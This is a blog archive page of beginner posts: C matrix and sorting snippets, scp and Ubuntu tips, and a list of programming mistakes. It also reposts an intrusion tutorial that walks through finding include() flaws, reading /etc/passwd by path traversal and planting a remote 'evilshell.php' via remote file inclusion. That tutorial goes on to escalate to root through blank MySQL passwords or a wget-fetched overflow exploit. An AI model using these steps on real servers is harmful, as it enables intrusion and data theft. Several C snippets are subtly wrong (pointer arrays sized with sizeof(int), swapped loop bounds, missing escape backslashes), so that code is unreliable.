Showing posts with label beginner. Show all posts
Showing posts with label beginner. Show all posts
Tuesday, 22 January 2013
Simple Sorting Algorithm Using DMA
This post provides the source code for simple and naive integer sorting algorithm by exploiting the dynamic memory allocation feature of C programming.
Read more...
#include <stdio.h>
#include <stdlib.h>
int main()
{
int *arr, i, j, n;
printf("Enter the number of items: ");
scanf("%d", &n);
arr = malloc(n * sizeof(int));
for (i = 0; i < n; i++)
{
printf("Enter the %dth item: ", i + 1);
scanf("%d", &arr[i]);
}
for (i = 0; i < n - 1; i++)
{
for (j = 0; j < n - 1; j++)
{
int temp;
if (arr[j] > arr[j + 1])
{
temp = arr[j];
arr[j] = arr[j + 1];
arr[j + 1] = temp;
}
}
}
printf("The sorted array is:\n");
for (i = 0; i < n; i++)
{
printf("%d\n", arr[i]);
}
return 0;
}
samar@samar-Techgaun:~$ gcc -Wall -o sort sort.c samar@samar-Techgaun:~$ ./sort Enter the number of items: 5 Enter the 1th item: 2 Enter the 2th item: 4 Enter the 3th item: 1 Enter the 4th item: 92 Enter the 5th item: 45 The sorted array is: 1 2 4 45 92
Read more...
Bookmark this post: | 
|
Matrix Multiplication Using DMA [C Source Code]
This post provides a source code for matrix multiplication by dynamically allocating memory for matrices to be multiplied and multiplication of those matrices.
Read more...
#include <stdio.h>
#include <stdlib.h>
int main()
{
int **A, **B, **C, m, n, p, q, i, j, k;
printf("Enter the size of matrix A: ");
scanf("%d %d", &m, &n);
printf("Enter the size of matrix B: ");
scanf("%d %d", &p, &q);
if (n == p)
{
A = malloc(m * sizeof(int));
B = malloc(p * sizeof(int));
C = malloc(m * sizeof(int));
for (i = 0; i < m; i++)
{
A[i] = malloc(n * sizeof(int));
C[i] = malloc(q * sizeof(int));
}
for (i = 0; i < p; i++)
{
B[i] = malloc(q * sizeof(int));
}
printf("Enter the matrix A:\n\n");
for (i = 0; i < m; i++)
{
for (j = 0; j < n; j++)
{
scanf("%d", &A[i][j]);
}
}
printf("Enter the matrix B:\n\n");
for (i = 0; i < p; i++)
{
for (j = 0; j < q; j++)
{
scanf("%d", &B[i][j]);
}
}
for (i = 0; i < m; i++)
{
for (j = 0; j < q; j++)
{
C[i][j] = 0;
for (k = 0; k < n; k++)
{
C[i][j] = C[i][j] + (A[i][k] * B[k][j]);
}
}
}
printf("Multiplication of given matrices is: \n\n");
for (i = 0; i < m; i++)
{
for (j = 0; j < q; j++)
{
printf("%d ", C[i][j]);
}
printf("\n");
}
for (i = 0; i < m; i++)
{
free(A[i]);
free(C[i]);
}
for (i = 0; i < p; i++)
{
free(B[i]);
}
free(A);
free(B);
free(C);
}
else
{
printf("Matrix multiplication is not possible for given size\n\n");
}
return 0;
}
samar@samar-Techgaun:~$ gcc -Wall -o matrix_mul matrix_mul.c samar@samar-Techgaun:~$ ./matrix_mul Enter the size of matrix A: 3 2 Enter the size of matrix B: 2 3 Enter the matrix A: 1 2 3 4 5 6 Enter the matrix B: 1 2 3 4 5 6 Multiplication of given matrices is: 9 12 15 19 26 33 29 40 51
Read more...
Bookmark this post: |
|
Thursday, 17 January 2013
Addition Of Two Matrices Using DMA [C Source Code]
Here is the source code in C that makes use of DMA function malloc() to dynamically allocate the memory for matrices and find their sum.
Below is a sample run along with the compilation step.
Read more...
#include <stdio.h>
#include <stdlib.h>
int main()
{
int **A, **B, **C, m, n, p, q, i, j;
printf("Enter the size of matrix A: ");
scanf("%d %d", &m, &n);
printf("Enter the size of matrix B: ");
scanf("%d %d", &p, &q);
if (m == p && n == q)
{
A = malloc(m * sizeof(int));
B = malloc(m * sizeof(int));
C = malloc(m * sizeof(int));
for (i = 0; i < m; i++)
{
A[i] = malloc(n * sizeof(int));
B[i] = malloc(n * sizeof(int));
C[i] = malloc(n * sizeof(int));
}
printf("Enter the matrix A:\n\n");
for (i = 0; i < m; i++)
{
for (j = 0; j < n; j++)
{
scanf("%d", &A[i][j]);
}
}
printf("Enter the matrix B:\n\n");
for (i = 0; i < m; i++)
{
for (j = 0; j < n; j++)
{
scanf("%d", &B[i][j]);
}
}
for (i = 0; i < m; i++)
{
for (j = 0; j < n; j++)
{
C[i][j] = A[i][j] + B[i][j];
}
}
printf("The addition of two matrices is: \n\n");
for (i = 0; i < n; i++)
{
for (j = 0; j < m; j++)
{
printf("%d ", C[i][j]);
}
printf("\n");
}
for (i = 0; i < m; i++)
{
free(A[i]);
free(B[i]);
free(C[i]);
}
free(A);
free(B);
free(C);
}
else
{
printf("Matrix addition is not possible for given size\n\n");
}
return 0;
}
Below is a sample run along with the compilation step.
samar@samar-Techgaun:~$ gcc -Wall -o matrix_addn matrix_addn.c samar@samar-Techgaun:~$ ./matrix_addn Enter the size of matrix A: 2 2 Enter the size of matrix B: 2 2 Enter the matrix A: 1 2 3 4 Enter the matrix B: 4 3 2 1 The addition of two matrices is: 5 5 5 5
Read more...
Bookmark this post: |
|
Tuesday, 15 January 2013
Transpose Of Matrix Using DMA [C Source Code]
This snippet utilizes the dynamic memory allocation function, malloc() and finds the transpose of the user provided matrix.
Below is the source code:
Below is the sample run:
Read more...
Below is the source code:
#include <stdio.h>
#include <stdlib.h>
int main()
{
int **matrix, **transpose, m, n, i, j;
printf("Enter the size of matrix: ");
scanf("%d %d", &m, &n);
matrix = malloc(m * sizeof(int));
transpose = malloc(n * sizeof(int));
for (i = 0; i < m; i++)
{
matrix[i] = malloc(n * sizeof(int));
}
for (i = 0; i < n; i++)
{
transpose[i] = malloc(m * sizeof(int));
}
printf("Enter the matrix:nn");
for (i = 0; i < m; i++)
{
for (j = 0; j < n; j++)
{
scanf("%d", &matrix[i][j]);
}
}
for (i = 0; i < m; i++)
{
for (j = 0; j < n; j++)
{
transpose[j][i] = matrix[i][j];
}
}
printf("The transpose of given matrix is: nn");
for (i = 0; i < n; i++)
{
for (j = 0; j < m; j++)
{
printf("%d ", transpose[i][j]);
}
printf("n");
}
for (i = 0; i < m; i++)
{
free(matrix[i]);
}
for (i = 0; i < n; i++)
{
free(transpose[i]);
}
free(matrix);
free(transpose);
return 0;
}
Below is the sample run:
samar@Techgaun:~$ gcc -Wall -o transpose transpose.c samar@Techgaun:~$ ./transpose Enter the size of matrix: 2 3 Enter the matrix: 1 2 3 4 5 6 The transpose of given matrix is: 1 4 2 5 3 6
Read more...
Bookmark this post: |
|
Thursday, 16 February 2012
Art of hacking 4 - spyd3rm4n's guide to hacking
Well this is the part 4 of the art of hacking series I've been posting here. Since the original site dmz has been down since long time, I have been uploading these tutorials. This part of tutorial explains what a PHP shell is and how you can use the php shell to gain the root access in the servers.
[0x01] PHP_Shell - what it is
[0x02] Root
[0x03] Obtaining_Root
Sub PHP_Shell{
What is a PHP Shell you may ask yourself. A PHP Shell is exactly what it says. It is a shell written in PHP that is used to emulate console and contains automated scripts to help you do whatever it is that you need. My favorite shell is the x2300, although it is hard to come by.
}
Sub Root{
root is the user on a nix based OS that has all privileges to do anything wished. Obtaining it through a PHP Shell can be a long and frustrating process.
The first thing that needs to be done, is the get a PHP Shell on the system. This can be done through and RFI (Remote File Inclusion) vulnerability.
Example: http://site.com/index.php?page=about.php
You can use this as an LFI (Local File Inclusion) and RFI.
This will show the passwd on the linux box. Giving you directory listing for every user on it.
This will include the evilshell.php located at anothersite.com
Looking for a vulnerability in a script:
The easiest way to find an LFI/RFI is to look for something like
include();
@include();
as long as the include() function includes user input, like
This is the GET method, $page is assigned to the value of page. http://site.com/index.php?page=
@include($page);
^ Jackpot.
Once the shell is on the site, you can look around for anything useful on the box that can be used to obtain root. I suggest looking for config files that contain mysql information. If you find the resellers config or global.inc file and it contains root mysql information, you can use this to look through the mysql database for any software that requires root input.
Example:
Lets say for the sake of this tutorial, I have software on my computer that requires root to run. So I have to give it the root user and password. This is stored in the mysql database. Once someone is in the mysql database and finds the information for that software, they will see the root user and pw for the box.
That is one of the most common ways of obtaining root through research. One thing to note, is that hosting companies often forget to assign a password for root mysql. So if you have a PHP Shell, try connecting to the SQL Database using the user root and no password. Funny how there is no fix for human error.
Another way to obtain root is through an overflow. You can get these root shells, usually scripts that will exploit and overflow a process running as root to spill out/change/grant a user root privileges.
Example:
There is a process running as root, this process is a result of the program called shell_av (Shell AntiVirus)
Now, lets say I know a local root overflow exploit for shell_av. I will create a script using shell code (which will be covered in the mini-book stack/buffer overflows) in C that will overflow this app and use the PHP Shell to wget it from a remote server so I don't have to type it all up in that little cmd box.
Once executed the cmd box will output the information for that overflow. Let's say that the overflow only granted the user that the shell is on root priviledges.
(The PHP Shell is located on in the directory of /home/bob/public_html/ - bob is the user)
This would grant bob root privileges. Now all you have to do is get bob's password and login SSH, and you have complete control of the box.
}
- Credits : Kr3w of TheDefaced.
Read more...
[0x01] PHP_Shell - what it is
[0x02] Root
[0x03] Obtaining_Root
Sub PHP_Shell{
What is a PHP Shell you may ask yourself. A PHP Shell is exactly what it says. It is a shell written in PHP that is used to emulate console and contains automated scripts to help you do whatever it is that you need. My favorite shell is the x2300, although it is hard to come by.
}
Sub Root{
root is the user on a nix based OS that has all privileges to do anything wished. Obtaining it through a PHP Shell can be a long and frustrating process.
The first thing that needs to be done, is the get a PHP Shell on the system. This can be done through and RFI (Remote File Inclusion) vulnerability.
Example: http://site.com/index.php?page=about.php
You can use this as an LFI (Local File Inclusion) and RFI.
http://site.com/index.php?page=../../../../../etc/passwd
This will show the passwd on the linux box. Giving you directory listing for every user on it.
http://site.com/index.php?page=http://anothersite.com/evilshell.php
This will include the evilshell.php located at anothersite.com
Looking for a vulnerability in a script:
The easiest way to find an LFI/RFI is to look for something like
include();
@include();
as long as the include() function includes user input, like
$page = $_GET['page'];
This is the GET method, $page is assigned to the value of page. http://site.com/index.php?page=
@include($page);
^ Jackpot.
Once the shell is on the site, you can look around for anything useful on the box that can be used to obtain root. I suggest looking for config files that contain mysql information. If you find the resellers config or global.inc file and it contains root mysql information, you can use this to look through the mysql database for any software that requires root input.
Example:
Lets say for the sake of this tutorial, I have software on my computer that requires root to run. So I have to give it the root user and password. This is stored in the mysql database. Once someone is in the mysql database and finds the information for that software, they will see the root user and pw for the box.
That is one of the most common ways of obtaining root through research. One thing to note, is that hosting companies often forget to assign a password for root mysql. So if you have a PHP Shell, try connecting to the SQL Database using the user root and no password. Funny how there is no fix for human error.
Another way to obtain root is through an overflow. You can get these root shells, usually scripts that will exploit and overflow a process running as root to spill out/change/grant a user root privileges.
Example:
There is a process running as root, this process is a result of the program called shell_av (Shell AntiVirus)
Now, lets say I know a local root overflow exploit for shell_av. I will create a script using shell code (which will be covered in the mini-book stack/buffer overflows) in C that will overflow this app and use the PHP Shell to wget it from a remote server so I don't have to type it all up in that little cmd box.
Once executed the cmd box will output the information for that overflow. Let's say that the overflow only granted the user that the shell is on root priviledges.
(The PHP Shell is located on in the directory of /home/bob/public_html/ - bob is the user)
This would grant bob root privileges. Now all you have to do is get bob's password and login SSH, and you have complete control of the box.
}
- Credits : Kr3w of TheDefaced.
Read more...
Bookmark this post: |
|
Tuesday, 14 February 2012
Hacking Step by Step For Beginners [Guest Post]
This article is an excellent step-by-btep tutorial for those who want to be hackers. Don't expect it to teach you step-wise process of hacking a website or an e-mail address. Instead, this tutorial is aimed to help you how you should proceed to really understand the computer systems so that you become a real computer hacker.
Fear not!!! Here are step-by-step instructions on how to become a
hacker. Simply follow the instructions given below, and when you get to
the end you will be a real hacker.
Ok, here are the step-by-step instructions. Follow them exactly and you
will be a real hacker. Once you are comfortable with, you can branch out
into other areas...
[1] Well, if you are a real novice on, it is hard, you wouldn’t be
reading this document now anyways! For starter now get a gud INTERNET
connection.
[2] Now, Net runs on Unix base system, I guess there will be no harm
saying that, since >80% server uses Linux! So naturally, you have to do
the same. So download a any Linux distribution (starters Linux Mint
would be really helpful).
[3] Its time for change! and for real! Install Linux in full hard drive!
Its not like I'm the enemy of other OS, its just the human nature to
avoid the change! if its critical Re-partition your hard drive for dual
boot. If you are using Windows don't even bother about it, they are for
lamer anyway.
[4] Get comfortable with Linux environment. Till this point you learn
about major distribution & their philosophies. You try different stuffs!
Change themes, install software! write your own review in blogs, create
fb pages and google groups and post lot [I wonder how many are still
active!]
"Ahh! awesome! just can't wait for new release of 12.04" something like
that.
[5] Start learning about a programming language called C. You try to
switch between the different IDE, and some bozo will tell you C is just
back screen! no GUI try something like JAVA which is worthless shit( या हावा)! don't be
fooled by them coz real hacker will never use the worthless shit (हावा) like JAVA.
[6] This is the time where you find your self into the religious cult of
the distro's. Now start learning Black Screen with blinki cursor called
shell. You will realized the importance of that black screen! (I bet you
hated the Blue screen while in the far past you still used windows).
Learn till the point so you don't need to touch Mouse or need GUI.
[7] You grow impatient can't find stuff which you want! And someone tell
you ask in IRC they are very decent folks! and really helpful. You make
fool out of yourself taking with bots or Getting kicked out / banned.
You realize you should read the Rules which eventually make your habit
of reading the man pages of every command even though you don't get it.
Dunn't worry your are 5% of the way out of lamerland!
[8] You find the gcc is not only the C complier but collection of
complies. Its man pages can be turn into 500 pages book. In mean time
branch out to some cool scripting languages like python, Perl. You might
also wanna write your own Linux programs. Read them use them Read them
again, because most of what you read the first time confused you.
Now play with Perl, C, C++ on your system until you can actually
program. Now practice programming for a while until you get at least a
little good at it. Give yourself plenty time to practice.
[9] Its the time when you have the Linux Journal Archive. Now its time
to grab some book called Operating System. Now its time to leave your
बच्चा Linux to something serious. I guess you would have now realize what
you are using was totally for posers. If not you don't think so you have
still some years left.
[10] By this time wikipedia, distro forum, programming forums would have
been your most visited sited, and u realize the groups in the fb are
filled with posers and bozo. You understand the true meaning of hacking
and you stock piled the books and might have also running Apache server!
FTP and samba too.
[11] Install non-childish(non-बच्चा) Linux on your system. Install everything. If your
system boots up properly to Linux, then congrats! Now that you are
running a real OS, read the docs, man pages, how-to's, FAQs, etc. Of
course, you won't understand most of it right away, but read all this
stuff anyway, so you will know where to look later. Read it all? Ok, go
back and read it again. You are 5% of the way to be hacker!
[12] Now configure your system for you have tons of text files to edit,
and you realize the GUI installer is useless after all. But at this
point you might possibly know enough to actually ask a partly
intelligent question on the net. You subscribe tons of mailing list.
Whatever you do, DON'T POST ANYTHING, because nobody wants to read
anything you have to say yet. Just lurk for a year or two. You *might*
now be IRC (as long as nobody remembers you were one who use to talk
with bots).
[13] Now you need to get and read all the RFCs. These contain
information that is vital if you want to hack the net. Again, you didn't
understand everything the first time, so read them
all again. You learn about the Cryptography, File sharing, SSH, SSL,
802.11, lots of stuffs. By this time you would have 100 books regarding!
and long list of your personal notes and reference cards.
[14] Now, you understand the developer mailing list one you subscribed
long time back and few security related mailing lists which you used to
ignore and divert them to trash. You should have enough info to try
some simple hacks, so try some. If they work, great, you are almost a
junior hacker. If they don't work, then do some more reading and try
again. Don't give up, keep at it even if it takes you a few years.
[15] Explore the net. Try things. Look for security holes. Read a lot of
source code. Write some hacking utilities. At this point, you are now a
real junior hacker and start pasting someone’s database in paste bin!
This whole process does take a little bit of time, but it is the
quickest way for an lamer to learn to hack. Some of you lamer don't have
the brain power to complete the above 15 steps, but try anyway...
True, this might take you a few years, but it will be worth the wait. If
you post anything too early, people will know that you are still a lamer
and wanna-be, and everyone will laugh at you and flame you and call you
nasty names, just like when you were on Windows!
Reference and Copies:
17 Steps to Hack
Ubuntards
some cools stuff which i can't remember
Read more...
"How do you hack"? "I wanna to learn hacking". "How to get started"?
"How can I get the password"? "How do I crack "?
Does this sound like you? who needs to learn how to hack? And nobody
will even speak to you much less send you any info???
Fear not!!! Here are step-by-step instructions on how to become a
hacker. Simply follow the instructions given below, and when you get to
the end you will be a real hacker.
Ok, here are the step-by-step instructions. Follow them exactly and you
will be a real hacker. Once you are comfortable with, you can branch out
into other areas...
[1] Well, if you are a real novice on, it is hard, you wouldn’t be
reading this document now anyways! For starter now get a gud INTERNET
connection.
[2] Now, Net runs on Unix base system, I guess there will be no harm
saying that, since >80% server uses Linux! So naturally, you have to do
the same. So download a any Linux distribution (starters Linux Mint
would be really helpful).
[3] Its time for change! and for real! Install Linux in full hard drive!
Its not like I'm the enemy of other OS, its just the human nature to
avoid the change! if its critical Re-partition your hard drive for dual
boot. If you are using Windows don't even bother about it, they are for
lamer anyway.
[4] Get comfortable with Linux environment. Till this point you learn
about major distribution & their philosophies. You try different stuffs!
Change themes, install software! write your own review in blogs, create
fb pages and google groups and post lot [I wonder how many are still
active!]
"Ahh! awesome! just can't wait for new release of 12.04" something like
that.
[5] Start learning about a programming language called C. You try to
switch between the different IDE, and some bozo will tell you C is just
back screen! no GUI try something like JAVA which is worthless shit( या हावा)! don't be
fooled by them coz real hacker will never use the worthless shit (हावा) like JAVA.
[6] This is the time where you find your self into the religious cult of
the distro's. Now start learning Black Screen with blinki cursor called
shell. You will realized the importance of that black screen! (I bet you
hated the Blue screen while in the far past you still used windows).
Learn till the point so you don't need to touch Mouse or need GUI.
[7] You grow impatient can't find stuff which you want! And someone tell
you ask in IRC they are very decent folks! and really helpful. You make
fool out of yourself taking with bots or Getting kicked out / banned.
You realize you should read the Rules which eventually make your habit
of reading the man pages of every command even though you don't get it.
Dunn't worry your are 5% of the way out of lamerland!
[8] You find the gcc is not only the C complier but collection of
complies. Its man pages can be turn into 500 pages book. In mean time
branch out to some cool scripting languages like python, Perl. You might
also wanna write your own Linux programs. Read them use them Read them
again, because most of what you read the first time confused you.
Now play with Perl, C, C++ on your system until you can actually
program. Now practice programming for a while until you get at least a
little good at it. Give yourself plenty time to practice.
[9] Its the time when you have the Linux Journal Archive. Now its time
to grab some book called Operating System. Now its time to leave your
बच्चा Linux to something serious. I guess you would have now realize what
you are using was totally for posers. If not you don't think so you have
still some years left.
[10] By this time wikipedia, distro forum, programming forums would have
been your most visited sited, and u realize the groups in the fb are
filled with posers and bozo. You understand the true meaning of hacking
and you stock piled the books and might have also running Apache server!
FTP and samba too.
[11] Install non-childish(non-बच्चा) Linux on your system. Install everything. If your
system boots up properly to Linux, then congrats! Now that you are
running a real OS, read the docs, man pages, how-to's, FAQs, etc. Of
course, you won't understand most of it right away, but read all this
stuff anyway, so you will know where to look later. Read it all? Ok, go
back and read it again. You are 5% of the way to be hacker!
[12] Now configure your system for you have tons of text files to edit,
and you realize the GUI installer is useless after all. But at this
point you might possibly know enough to actually ask a partly
intelligent question on the net. You subscribe tons of mailing list.
Whatever you do, DON'T POST ANYTHING, because nobody wants to read
anything you have to say yet. Just lurk for a year or two. You *might*
now be IRC (as long as nobody remembers you were one who use to talk
with bots).
[13] Now you need to get and read all the RFCs. These contain
information that is vital if you want to hack the net. Again, you didn't
understand everything the first time, so read them
all again. You learn about the Cryptography, File sharing, SSH, SSL,
802.11, lots of stuffs. By this time you would have 100 books regarding!
and long list of your personal notes and reference cards.
[14] Now, you understand the developer mailing list one you subscribed
long time back and few security related mailing lists which you used to
ignore and divert them to trash. You should have enough info to try
some simple hacks, so try some. If they work, great, you are almost a
junior hacker. If they don't work, then do some more reading and try
again. Don't give up, keep at it even if it takes you a few years.
[15] Explore the net. Try things. Look for security holes. Read a lot of
source code. Write some hacking utilities. At this point, you are now a
real junior hacker and start pasting someone’s database in paste bin!
This whole process does take a little bit of time, but it is the
quickest way for an lamer to learn to hack. Some of you lamer don't have
the brain power to complete the above 15 steps, but try anyway...
True, this might take you a few years, but it will be worth the wait. If
you post anything too early, people will know that you are still a lamer
and wanna-be, and everyone will laugh at you and flame you and call you
nasty names, just like when you were on Windows!
Reference and Copies:
17 Steps to Hack
Ubuntards
some cools stuff which i can't remember
The article was originally contributed by rhoit in the foss-nepal mailing list.
Read more...
Bookmark this post: |
|
Sunday, 18 December 2011
Copying Files From Remote Server Using SCP In Linux
Hi everybody, sometimes you need to copy files from remote server and only thing you have access to might be SSh. If you can access remote server via SSh, then you can copy files from the remote server using scp(secure file copy). This short tip will help you copy files from remote server using scp.
Scp is remote secure file copy program that makes use of SSh for the data transfer and uses the SSh authentication. The general syntax is as below:
Following was the command I used to copy a file from remote server to my computer. It will then ask for the password for the corresponding user before you can copy the file.
Also, there are GUIs for this purpose as well such as WinSCP for windows and Krusader file manager and gftp for linux distros. GUI would make things easier but still I am used to with command lines and I hope you are as well.
I hope this helps. :)
Edit(Dec 19): Paths with whitespaces must be escaped with \ character. An example of this is as below:
Read more...
Scp is remote secure file copy program that makes use of SSh for the data transfer and uses the SSh authentication. The general syntax is as below:
scp -P ssh_port user@server:remote_file_path local_file_path
Following was the command I used to copy a file from remote server to my computer. It will then ask for the password for the corresponding user before you can copy the file.
scp -P 222 netadmin@192.168.0.1:/home/kubh/Desktop/torrent_trackers_list.txt /samar/torrent_trackers.txt
Also, there are GUIs for this purpose as well such as WinSCP for windows and Krusader file manager and gftp for linux distros. GUI would make things easier but still I am used to with command lines and I hope you are as well.
I hope this helps. :)
Edit(Dec 19): Paths with whitespaces must be escaped with \ character. An example of this is as below:
samar@Techgaun:~$ scp -P 222 "netadmin@192.168.0.1:/home/netadmin/Downloads/Hostel\ Part\ III\ \(2011\)\ DVDRip\ 400MB/HOST.DVD_urgrove.com.mkv.002" /samar/Moviez/Hostel1.mkv.002
Read more...
Bookmark this post: |
|
Tuesday, 22 November 2011
Common Programming Mistakes Beginner Programmers Do
The beginner programmers make some common mistakes which might be due to the lack of practice and deeper understanding of the language syntax and semantics. Here I am listing some of the common programming mistakes every programmer does when s/he is beginner or new to programming.
Mistake #1: Lack of code modularization
Many beginners just write everything within the main function and end up repeating many statements again and again. Rather than having everything within a single main function, you could separate the certain logic in a separate module known as function and then just call that function when needed. If you haven't heard about function, start with google and learn to write some. You'll not regret learning to make functions.
Mistake #2: Another common mistake is not indenting(Read the section Indentation in programming in wikipedia entry) your code and not writing the proper comments in the places wherever necessary. Lack of proper indentation and comments reduce readability. While many compilers and interpreters do not take care about the indentation and comments, human eyes find it easy to understand the properly indented and commented code. Also, some languages such as python rely on indentation where indentation is a must.
Mistake #3: Another common mistake is to use '=' instead of '=='. I've seen this mistake in a lot of codes done by my beginner friends usually in the conditional statements(such as if else) thus resulting in a completely wrong output many times. FYI, '=' is the assignment operator while '==' is the is equal to operator. Note that when '=' is used, the variable on left side of '=' gets set to the value of the expression on the rights. The assignment operator changes the variable on the left to have a new value, while the equal operator '==' tests for equality and returns true or false.
Mistake #4: Integer and float division is also another common mistake every beginner programmer happens to do. In the language like C, the division such as 5/10 will result in 0 since 5 and 10 both are integers and integer division is done. This might lead to mathematical errors in programming. So be sure to typecast the variables to the proper data type before performing division.
Mistake #5: Another common mistake is the use of uninitialized variables. Beginners forget to assign the values to the variables thus giving unexpected outputs such as garbage values in C. Some languages provide default values (such as 0 or null) for uninitialized variables but still using uninitialized variable is a mistake to avoid. Also, many forget to declare the variables thus producing compiler error.
Mistake #6: Another mistake is to compare the strings in C(strings in C are array of characters) using the is equal to '==' operator. Note that string comparison in C requires use of the library functions such as strcmp(), strcmpi() and their safe alternatives such as strncmp() and strncmpi(). Btw, do not use strcmp() and strcmpi() since they do not check length thus might lead to overflow.
Mistake #7: Using wrong range of array indices is also another common mistakes the beginners do. For example, an array of size 10 should be accessed using indices from 0 to 9, not from 1 to 10. Also, some other languages such as Matlab and Fortran, indices will go from 1 to 10. Just make sure you understand the specifications of the language you are learning.
Mistake #8: Using function calls within the looping condition is another mistake. Lets take an example of the following code snippet:
In each iteration, the strlen() function is being called which can slow down your program. So always avoid such calls within the looping conditions.
Mistake #9: Another mistake is the use of insecure and vulnerable functions. If you are going to use certain function, always make a deep study about it to know whether it is secure or not and if it is not secure, search for its secure alternative. Buffer overflows are one of the things you should always try to prevent. Also, if you are doing PHP or other web-based language, always use the safe functions to avoid common security issues such as SQL Injection, Cross Site Scripting, etc. Always research to write secure codes so that you can prevent hackers breaking your code.
Mistake #10: Finally, beginners tend to leave what they are doing if they can not locate errors and mistakes in their code. Just remember studying and practising is the only key to master any stuff which applies to programming as well. You've got such a big resource like internet, so make extensive use of it and never let you go down. Just read and practise and you'll eventually master yourself.
I hope this post helps beginner programmers out there. :)
Read more...
Mistake #1: Lack of code modularization
Many beginners just write everything within the main function and end up repeating many statements again and again. Rather than having everything within a single main function, you could separate the certain logic in a separate module known as function and then just call that function when needed. If you haven't heard about function, start with google and learn to write some. You'll not regret learning to make functions.
Mistake #2: Another common mistake is not indenting(Read the section Indentation in programming in wikipedia entry) your code and not writing the proper comments in the places wherever necessary. Lack of proper indentation and comments reduce readability. While many compilers and interpreters do not take care about the indentation and comments, human eyes find it easy to understand the properly indented and commented code. Also, some languages such as python rely on indentation where indentation is a must.
Mistake #3: Another common mistake is to use '=' instead of '=='. I've seen this mistake in a lot of codes done by my beginner friends usually in the conditional statements(such as if else) thus resulting in a completely wrong output many times. FYI, '=' is the assignment operator while '==' is the is equal to operator. Note that when '=' is used, the variable on left side of '=' gets set to the value of the expression on the rights. The assignment operator changes the variable on the left to have a new value, while the equal operator '==' tests for equality and returns true or false.
Mistake #4: Integer and float division is also another common mistake every beginner programmer happens to do. In the language like C, the division such as 5/10 will result in 0 since 5 and 10 both are integers and integer division is done. This might lead to mathematical errors in programming. So be sure to typecast the variables to the proper data type before performing division.
Mistake #5: Another common mistake is the use of uninitialized variables. Beginners forget to assign the values to the variables thus giving unexpected outputs such as garbage values in C. Some languages provide default values (such as 0 or null) for uninitialized variables but still using uninitialized variable is a mistake to avoid. Also, many forget to declare the variables thus producing compiler error.
Mistake #6: Another mistake is to compare the strings in C(strings in C are array of characters) using the is equal to '==' operator. Note that string comparison in C requires use of the library functions such as strcmp(), strcmpi() and their safe alternatives such as strncmp() and strncmpi(). Btw, do not use strcmp() and strcmpi() since they do not check length thus might lead to overflow.
Mistake #7: Using wrong range of array indices is also another common mistakes the beginners do. For example, an array of size 10 should be accessed using indices from 0 to 9, not from 1 to 10. Also, some other languages such as Matlab and Fortran, indices will go from 1 to 10. Just make sure you understand the specifications of the language you are learning.
Mistake #8: Using function calls within the looping condition is another mistake. Lets take an example of the following code snippet:
for (i = 0; i < strlen(str); i++)
{
//do something
}
In each iteration, the strlen() function is being called which can slow down your program. So always avoid such calls within the looping conditions.
int len = strlen(str);
for (i = 0; i < len; i++) { //do something }
for (i = 0; i < len; i++) { //do something }
Mistake #9: Another mistake is the use of insecure and vulnerable functions. If you are going to use certain function, always make a deep study about it to know whether it is secure or not and if it is not secure, search for its secure alternative. Buffer overflows are one of the things you should always try to prevent. Also, if you are doing PHP or other web-based language, always use the safe functions to avoid common security issues such as SQL Injection, Cross Site Scripting, etc. Always research to write secure codes so that you can prevent hackers breaking your code.
Mistake #10: Finally, beginners tend to leave what they are doing if they can not locate errors and mistakes in their code. Just remember studying and practising is the only key to master any stuff which applies to programming as well. You've got such a big resource like internet, so make extensive use of it and never let you go down. Just read and practise and you'll eventually master yourself.
I hope this post helps beginner programmers out there. :)
Read more...
Bookmark this post: |
|
Wednesday, 26 October 2011
Useful and Basic Commands and Shortcuts For Ubuntu Beginners
One of my friends asked me to list useful commands and shortcuts for him to use in his ubuntu distro. I listed some pretty useful ones and am also sharing them over here.
Basic Commands
Alt + F1: Opens application menu.
Alt + F2: Opens run command(something similar to run command in windows)
Ctrl +Alt + FN: Switch to TTYN terminals
Ctrl +Alt + F7: Switch to X Display
mkdir <dir_name>: Create a directory
cd $HOME: Set the current path as your home directory
cd /: Set the current path as root filesystem
Privileged commands: Note that most of these commands require you to have sudoers privilege which is specified in /etc/sudoers file.
sudo su: Run the shell as root user.
sudo su user: Run the shell as the user specified
sudo command: Run the specified command with root privilege
gksudo command: Run the specified command as graphical root mode.(used for graphical programs)
passwd: Change your password
Basic Network Commands
ifconfig: Displays information about network. Also, ifconfig interface would give information about the specified interface.
iwconfig: Displays information about wireless network
ping host_or_IP: Pings to check if the specified host or IP is online or not. Also useful for knowing if you are connected to some other network eg. internet.
host ip_addr: Displays hostname for specified IP address by querying nameservers specified in /etc/resolv.conf
ifup interface: Bring the specified network up.
ifdown interface: Bring the specified network down.
ssh user@hostname -p PORTNO: Establish SSh connection to specified host and port number and login as specified user.
Commands For Package Management: These commands require root privilege so either escalate privilege to root by sudo su command or precede each commands with sudo.
apt-get install package1 package2 .. packageN: Download and install the package(s) specified.
apt-get install -d package: Just download the packages(no installation)
apt-get update: Update packages information.
apt-get dist-upgrade: Perform distro version upgrade.
do-release-upgrade: Perform distro version upgrade.
apt-get remove package: Remove the specified package(s).
apt-get -f install: Fix packages problem.
dpkg --configure -a: Fix broken packages.
Other/Misc. Commands
id: Displays user and group IDs for current user.
uname -a: Displays all kernel information
gedit: Open text editor
nautilus: Open nautilus file manager
gksudo nautilus: Open root nautilus file manager
lsb_release -a: Get information about installed ubuntu version
These are some of the commands that has come in my mind as of now. I might update this list when some other commands come into my mind. By the way, TAB is very useful in terminal as it allows auto-completion and suggestion of commands and files in ubuntu. What this means is if you type do- and then press TAB, it will auto complete the command to do-release-upgrade thus saving some important time. Also be sure to share the useful commands in the comment section below.
Read more...
Basic Commands
Alt + F1: Opens application menu.
Alt + F2: Opens run command(something similar to run command in windows)
Ctrl +Alt + FN: Switch to TTYN terminals
Ctrl +Alt + F7: Switch to X Display
mkdir <dir_name>: Create a directory
cd $HOME: Set the current path as your home directory
cd /: Set the current path as root filesystem
Privileged commands: Note that most of these commands require you to have sudoers privilege which is specified in /etc/sudoers file.
sudo su: Run the shell as root user.
sudo su user: Run the shell as the user specified
sudo command: Run the specified command with root privilege
gksudo command: Run the specified command as graphical root mode.(used for graphical programs)
passwd: Change your password
Basic Network Commands
ifconfig: Displays information about network. Also, ifconfig interface would give information about the specified interface.
iwconfig: Displays information about wireless network
ping host_or_IP: Pings to check if the specified host or IP is online or not. Also useful for knowing if you are connected to some other network eg. internet.
host ip_addr: Displays hostname for specified IP address by querying nameservers specified in /etc/resolv.conf
ifup interface: Bring the specified network up.
ifdown interface: Bring the specified network down.
ssh user@hostname -p PORTNO: Establish SSh connection to specified host and port number and login as specified user.
